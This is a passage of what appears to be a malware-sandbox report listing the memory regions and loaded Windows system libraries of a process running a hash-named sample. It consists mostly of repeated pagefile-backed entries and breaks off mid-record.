"8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 1448 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1449 start_va = 0x2040000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 1450 start_va = 0x2240000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1451 start_va = 0x2640000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1452 start_va = 0x2e40000 end_va = 0x3e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 2091 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 2093 start_va = 0x3e10000 end_va = 0x4146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2097 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2098 start_va = 0x4150000 end_va = 0x43dbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 2104 start_va = 0x4150000 end_va = 0x42a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 2105 start_va = 0x4150000 end_va = 0x4311fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 2191 start_va = 0x4150000 end_va = 0x56d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3214 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3215 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3216 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3217 start_va = 0x4150000 end_va = 0x4314fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3218 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3219 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3220 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3225 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3226 start_va = 0x4150000 end_va = 0x42abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3239 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3252 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3253 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3268 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3269 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3270 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3271 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3272 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3273 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3274 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3275 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3276 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3277 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3278 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3285 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3286 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3287 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3288 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3289 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3290 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3291 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3292 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3293 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3294 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3295 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3296 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3297 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3298 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3299 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3300 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3301 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3302 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3303 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3304 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3305 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3306 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3307 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3308 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3309 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3310 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3311 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3312 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3313 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3314 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3320 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3321 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3322 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3323 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3324 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3325 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3326 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3327 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3328 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3329 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3330 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3331 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3332 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3333 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3334 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3335 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3336 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3338 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3339 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3359 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3360 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3361 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3362 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3363 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3364 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3365 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3366 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3367 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3368 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3369 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3370 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3371 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3372 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3373 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3374 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3375 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3376 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3382 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3383 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3384 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3385 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3386 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3387 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3388 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3389 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3390 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3391 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3392 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3393 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3394 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3395 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3396 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3397 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3398 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3399 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3400 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3401 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3402 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3403 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3404 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3405 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3406 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3407 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3408 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3409 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3410 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3411 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3412 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3413 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3414 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3415 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3416 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3417 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3418 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3419 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3420 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3421 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3422 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3423 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3424 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3425 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type 